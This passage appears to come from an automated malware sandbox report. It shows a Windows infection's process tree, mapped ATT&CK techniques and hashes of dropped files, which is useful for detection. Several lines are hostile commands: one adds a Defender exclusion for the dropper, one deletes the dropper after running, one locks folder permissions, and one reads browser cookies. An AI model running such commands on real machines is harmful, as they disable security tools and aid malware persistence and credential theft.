                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:2868
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              PID:2924
                                                                        • C:\Windows\system32\conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe "-210524444712739031-2092269491157293024-5178044431074954458727336893-649117415"
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          • Checks processor information in registry
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:2152
                                                                        • C:\Windows\system32\conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe "1120399918-1086878361-2090971430-10175157841495242494496533190509852655-157430343"
                                                                          1⤵
                                                                          • Loads dropped DLL
                                                                          • Modifies registry class
                                                                          PID:2140
                                                                        • C:\Windows\system32\DllHost.exe
                                                                          C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                          1⤵
                                                                            PID:952
                                                                          • C:\Windows\system32\conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe "-9944321961254264275-18806331641656890317-524863554-984168649860953488-1676163686"
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:2804
                                                                          • C:\Windows\system32\conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe "-177082372221404982587421189761665801314-10630754151065273101-529984944-34363938"
                                                                            1⤵
                                                                            • Drops file in Program Files directory
                                                                            PID:2940
                                                                          • C:\Windows\system32\conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe "-277557216-131097518103789653-947266411527852357-1803189615-918599965606085809"
                                                                            1⤵
                                                                              PID:2604
                                                                            • C:\Windows\system32\conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe "-282887764-7877155431346848289862699276-10544138501793087685-243937038-1075900311"
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              PID:2592
                                                                            • C:\Users\Admin\AppData\Local\Temp\A0B2.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\A0B2.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:2712
                                                                            • C:\Users\Admin\AppData\Local\Temp\A304.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\A304.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:2448
                                                                            • C:\Users\Admin\AppData\Local\Temp\B270.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\B270.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              PID:2168
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\B270.exe"
                                                                                2⤵
                                                                                  PID:2252
                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                    timeout /T 10 /NOBREAK
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:1412
                                                                              • C:\Users\Admin\AppData\Local\Temp\FE3F.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\FE3F.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                PID:2704
                                                                              • C:\Users\Admin\AppData\Local\Temp\6F7.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\6F7.exe
                                                                                1⤵
                                                                                  PID:1848
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    2⤵
                                                                                      PID:2780
                                                                                  • C:\Users\Admin\AppData\Local\Temp\BE8.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\BE8.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2600
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1442.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\1442.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Drops startup file
                                                                                    • NTFS ADS
                                                                                    PID:1852
                                                                                  • C:\Users\Admin\AppData\Local\Temp\2515.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\2515.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:2480
                                                                                    • C:\Users\Admin\AppData\Local\Temp\2515.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\2515.exe
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      PID:2504
                                                                                  • C:\Users\Admin\AppData\Local\Temp\30B9.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\30B9.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2316
                                                                                  • C:\Users\Admin\AppData\Local\Temp\38F4.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\38F4.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2672
                                                                                  • C:\Users\Admin\AppData\Local\Temp\3E33.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\3E33.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Windows security modification
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:3064
                                                                                    • C:\Users\Admin\AppData\Local\Temp\62a83125-c65f-4547-b59d-ad39b8e64dea\AdvancedRun.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\62a83125-c65f-4547-b59d-ad39b8e64dea\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\62a83125-c65f-4547-b59d-ad39b8e64dea\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2588
                                                                                      • C:\Users\Admin\AppData\Local\Temp\62a83125-c65f-4547-b59d-ad39b8e64dea\AdvancedRun.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\62a83125-c65f-4547-b59d-ad39b8e64dea\AdvancedRun.exe" /SpecialRun 4101d8 2588
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2356
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\3E33.exe" -Force
                                                                                      2⤵
                                                                                        PID:1008
                                                                                      • C:\Users\Admin\AppData\Local\Temp\3E33.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\3E33.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1892
                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                      1⤵
                                                                                        PID:2580
                                                                                      • C:\Windows\explorer.exe
                                                                                        C:\Windows\explorer.exe
                                                                                        1⤵
                                                                                          PID:2340
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:2876
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:2188
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:2016
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:1040
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:1476
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:2124
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                            PID:856
                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                            C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                            1⤵
                                                                                              PID:2340
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:1848
                                                                                            • C:\Users\Admin\AppData\Local\Temp\DAB1.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\DAB1.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Adds Run key to start application
                                                                                              PID:2612
                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                icacls "C:\Users\Admin\AppData\Local\6b12ceb7-bbe3-4088-9055-fce8e7e2f6b7" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                2⤵
                                                                                                • Modifies file permissions
                                                                                                PID:1012
                                                                                              • C:\Windows\SysWOW64\verclsid.exe
                                                                                                "C:\Windows\system32\verclsid.exe" /S /C {DFFACDC5-679F-4156-8947-C5C76BC0B67F} /I {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} /X 0x401
                                                                                                2⤵
                                                                                                  PID:2496
                                                                                              • C:\Users\Admin\AppData\Local\Temp\EA6B.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\EA6B.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Writes to the Master Boot Record (MBR)
                                                                                                PID:2628

                                                                                              Network

                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                              Persistence

                                                                                              Modify Existing Service

                                                                                              1
                                                                                              T1031

                                                                                              Registry Run Keys / Startup Folder

                                                                                              1
                                                                                              T1060

                                                                                              Bootkit

                                                                                              1
                                                                                              T1067

                                                                                              BITS Jobs

                                                                                              1
                                                                                              T1197

                                                                                              Defense Evasion

                                                                                              Modify Registry

                                                                                              6
                                                                                              T1112

                                                                                              Disabling Security Tools

                                                                                              3
                                                                                              T1089

                                                                                              File Permissions Modification

                                                                                              1
                                                                                              T1222

                                                                                              BITS Jobs

                                                                                              1
                                                                                              T1197

                                                                                              Install Root Certificate

                                                                                              1
                                                                                              T1130

                                                                                              Credential Access

                                                                                              Credentials in Files

                                                                                              4
                                                                                              T1081

                                                                                              Discovery

                                                                                              Software Discovery

                                                                                              1
                                                                                              T1518

                                                                                              Security Software Discovery

                                                                                              1
                                                                                              T1063

                                                                                              Query Registry

                                                                                              3
                                                                                              T1012

                                                                                              System Information Discovery

                                                                                              4
                                                                                              T1082

                                                                                              Peripheral Device Discovery

                                                                                              1
                                                                                              T1120

                                                                                              Remote System Discovery

                                                                                              1
                                                                                              T1018

                                                                                              Collection

                                                                                              Data from Local System

                                                                                              4
                                                                                              T1005

                                                                                              Command and Control

                                                                                              Web Service

                                                                                              1
                                                                                              T1102

                                                                                              Replay Monitor

                                                                                              Loading Replay Monitor...

                                                                                              Downloads

                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                MD5

                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                SHA1

                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                SHA256

                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                SHA512

                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                MD5

                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                SHA1

                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                SHA256

                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                SHA512

                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                              • C:\Program Files\MSBuild\DCBHZMRRLZ\ultramediaburner.exe
                                                                                                MD5

                                                                                                6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                SHA1

                                                                                                938acc555933ee4887629048be4b11df76bb8de8

                                                                                                SHA256

                                                                                                b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                SHA512

                                                                                                a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                              • C:\Program Files\MSBuild\DCBHZMRRLZ\ultramediaburner.exe
                                                                                                MD5

                                                                                                6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                SHA1

                                                                                                938acc555933ee4887629048be4b11df76bb8de8

                                                                                                SHA256

                                                                                                b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                SHA512

                                                                                                a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                              • C:\Program Files\install.dat
                                                                                                MD5

                                                                                                806c3221a013fec9530762750556c332

                                                                                                SHA1

                                                                                                36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                SHA256

                                                                                                9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                SHA512

                                                                                                56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                              • C:\Program Files\install.dll
                                                                                                MD5

                                                                                                fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                SHA1

                                                                                                6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                SHA256

                                                                                                9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                SHA512

                                                                                                0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                MD5

                                                                                                6bc316edb8b42a44f769fbe595debbce

                                                                                                SHA1

                                                                                                a3cd02839fb33c7c532d1b689b318d2ef3ab3bf2

                                                                                                SHA256

                                                                                                0e0d05fa3b6c675bae461f2f6b2d8a99d1862b1bee212ef06b1db721adc50a27

                                                                                                SHA512

                                                                                                9c0ab4c3c56eb65adfbc6afabd888c5d6e4d5d1e504cc92785334556f81d80b17c8ff431b278f2227231f66d870c82f9189e33ad520f15810941ee1c18ed15a7

                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                MD5

                                                                                                f32271a53ab10a75623d3d779f98933c

                                                                                                SHA1

                                                                                                7c45dfaf94d72d79d91f5ff175507540f6bf45f0

                                                                                                SHA256

                                                                                                f4375668a2aea8fc302152484ed6aba7daf5e0050fe334c09adf7a8dbd7e74bb

                                                                                                SHA512

                                                                                                a389cbd5db9c3039e9723f60afdaab0ef2d0f19bc894f3be81b722c0ed31facd9a56874d6ad2fe694d65dbc5578b33906f008f953f1062417a12becf7211d9b7

                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                MD5

                                                                                                fade8f24b67f63ae4158287c9d619801

                                                                                                SHA1

                                                                                                239820dfbe450824e2e8b78588cea26e8d93bedd

                                                                                                SHA256

                                                                                                0ba2dacc54aa0e30e1473f7828e67c0c9b1c53ae07b1a1e2ff1ecdfae41e7570

                                                                                                SHA512

                                                                                                f081ba96dc9b5597c454559a797b5fb982aea345834698305429a3c27433e63534974db6dbdb4fed82705d7bea493b494d8d11787e1820fa3e6ccb712fb5677b

                                                                                              • C:\Users\Admin\AppData\Local\Temp\4f-123a2-ced-6b9b1-8dbaf712f8af2\Paewazhuwela.exe
                                                                                                MD5

                                                                                                416cdf5a20930fc452afc2b2226e0296

                                                                                                SHA1

                                                                                                7392192ab84730fe2b1d295f78ce9ee228f71c0d

                                                                                                SHA256

                                                                                                85420e807cda618caf01eddeb5adbb3875a07eab79ec5d0b442717f219b6bda1

                                                                                                SHA512

                                                                                                b1c007ce8e27d1cf17a1ca585672236eabafc54a67b715e8b68af82cd2b837f306d6364a934339c74fa954c61be809a42c4a2b39aa6b1060817cdb0bd9ea371d

                                                                                              • C:\Users\Admin\AppData\Local\Temp\4f-123a2-ced-6b9b1-8dbaf712f8af2\Paewazhuwela.exe
                                                                                                MD5

                                                                                                416cdf5a20930fc452afc2b2226e0296

                                                                                                SHA1

                                                                                                7392192ab84730fe2b1d295f78ce9ee228f71c0d

                                                                                                SHA256

                                                                                                85420e807cda618caf01eddeb5adbb3875a07eab79ec5d0b442717f219b6bda1

                                                                                                SHA512

                                                                                                b1c007ce8e27d1cf17a1ca585672236eabafc54a67b715e8b68af82cd2b837f306d6364a934339c74fa954c61be809a42c4a2b39aa6b1060817cdb0bd9ea371d

                                                                                              • C:\Users\Admin\AppData\Local\Temp\4f-123a2-ced-6b9b1-8dbaf712f8af2\Paewazhuwela.exe.config
                                                                                                MD5

                                                                                                98d2687aec923f98c37f7cda8de0eb19

                                                                                                SHA1

                                                                                                f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                SHA256

                                                                                                8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                SHA512

                                                                                                95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                              • C:\Users\Admin\AppData\Local\Temp\75-9f2f4-6c6-d1498-1d7a5df0e3644\SHybuganaeki.exe
                                                                                                MD5

                                                                                                4aa6bbf2d091a9a87bac124c0adfc3f6

                                                                                                SHA1

                                                                                                a55729544d103ee3b40d13d12af5a5d87d2a6ead

                                                                                                SHA256

                                                                                                a584649ea9d8e4d8fd9a30bc6d2579421f59ef2ae2a076cf083b5cd567628688

                                                                                                SHA512

                                                                                                e3e71a968a2ed268a001959b5fb006fedee6c24820cb23cf68ba7bb83d5c8faf56f109a91373d6bb5728658d779bd6a002b54ea46b32dc7cb75f9a16751ce378

                                                                                              • C:\Users\Admin\AppData\Local\Temp\75-9f2f4-6c6-d1498-1d7a5df0e3644\SHybuganaeki.exe
                                                                                                MD5

                                                                                                4aa6bbf2d091a9a87bac124c0adfc3f6

                                                                                                SHA1

                                                                                                a55729544d103ee3b40d13d12af5a5d87d2a6ead

                                                                                                SHA256

                                                                                                a584649ea9d8e4d8fd9a30bc6d2579421f59ef2ae2a076cf083b5cd567628688

                                                                                                SHA512

                                                                                                e3e71a968a2ed268a001959b5fb006fedee6c24820cb23cf68ba7bb83d5c8faf56f109a91373d6bb5728658d779bd6a002b54ea46b32dc7cb75f9a16751ce378

                                                                                              • C:\Users\Admin\AppData\Local\Temp\75-9f2f4-6c6-d1498-1d7a5df0e3644\SHybuganaeki.exe.config
                                                                                                MD5

                                                                                                98d2687aec923f98c37f7cda8de0eb19

                                                                                                SHA1

                                                                                                f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                SHA256

                                                                                                8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                SHA512

                                                                                                95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                MD5

                                                                                                41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                SHA1

                                                                                                0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                SHA256

                                                                                                97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                SHA512

                                                                                                5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                MD5

                                                                                                41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                SHA1

                                                                                                0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                SHA256

                                                                                                97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                SHA512

                                                                                                5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                MD5

                                                                                                3b1b318df4d314a35dce9e8fd89e5121

                                                                                                SHA1

                                                                                                55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                SHA256

                                                                                                4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                SHA512

                                                                                                f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                MD5

                                                                                                3b1b318df4d314a35dce9e8fd89e5121

                                                                                                SHA1

                                                                                                55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                SHA256

                                                                                                4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                SHA512

                                                                                                f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                MD5

                                                                                                3bc84c0e8831842f2ae263789217245d

                                                                                                SHA1

                                                                                                d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                SHA256

                                                                                                757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                SHA512

                                                                                                f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                MD5

                                                                                                e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                SHA1

                                                                                                1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                SHA256

                                                                                                8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                SHA512

                                                                                                71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                MD5

                                                                                                e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                                                SHA1

                                                                                                1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                                                SHA256

                                                                                                8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                                                SHA512

                                                                                                71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-4ATEM.tmp\Install.tmp
                                                                                                MD5

                                                                                                45ca138d0bb665df6e4bef2add68c7bf

                                                                                                SHA1

                                                                                                12c1a48e3a02f319a3d3ca647d04442d55e09265

                                                                                                SHA256

                                                                                                3960a0597104fc5bbf82bf6c03564a1eb6a829c560d1f50d0a63b4772fafbe37

                                                                                                SHA512

                                                                                                cd1a0493c26798eb70b3dabb8a439de7792c4676905cad21c6b3f372213ce9f6b65648245defcd36d4f19285160f41c62e1025e772e6b9f11aa126388ea8364f

                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-KAUMS.tmp\ultramediaburner.tmp
                                                                                                MD5

                                                                                                4e8c7308803ce36c8c2c6759a504c908

                                                                                                SHA1

                                                                                                a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                                SHA256

                                                                                                90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                                SHA512

                                                                                                780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-KAUMS.tmp\ultramediaburner.tmp
                                                                                                MD5

                                                                                                4e8c7308803ce36c8c2c6759a504c908

                                                                                                SHA1

                                                                                                a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                                SHA256

                                                                                                90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                                SHA512

                                                                                                780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-UC1L8.tmp\Ultra.exe
                                                                                                MD5

                                                                                                cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                                SHA1

                                                                                                ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                                SHA256

                                                                                                0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                                SHA512

                                                                                                49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-UC1L8.tmp\Ultra.exe
                                                                                                MD5

                                                                                                cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                                SHA1

                                                                                                ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                                SHA256

                                                                                                0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                                SHA512

                                                                                                49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                              • C:\Users\Admin\AppData\Roaming\8143.tmp.exe
                                                                                                MD5

                                                                                                3f80505adbe9e3ca9ac771bb5c5534b4

                                                                                                SHA1

                                                                                                ace9127f27fa7e7ec8b9e0b00d536421fe11a0ca

                                                                                                SHA256

                                                                                                16dbc40aa9959aef811409bad004175ef135f91f5f57f039444425a44d13e45b

                                                                                                SHA512

                                                                                                1ea7ea14d26aaefa5345f0165ea154089e7d7617d68923e2713244099f2116d341cb54352f1b6b5ef5e0b2d8c244412113e111954eca707bdb01b16361197217

                                                                                              • C:\Users\Admin\AppData\Roaming\8143.tmp.exe
                                                                                                MD5

                                                                                                3f80505adbe9e3ca9ac771bb5c5534b4

                                                                                                SHA1

                                                                                                ace9127f27fa7e7ec8b9e0b00d536421fe11a0ca

                                                                                                SHA256

                                                                                                16dbc40aa9959aef811409bad004175ef135f91f5f57f039444425a44d13e45b

                                                                                                SHA512

                                                                                                1ea7ea14d26aaefa5345f0165ea154089e7d7617d68923e2713244099f2116d341cb54352f1b6b5ef5e0b2d8c244412113e111954eca707bdb01b16361197217

                                                                                              • \Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                MD5

                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                SHA1

                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                SHA256

                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                SHA512

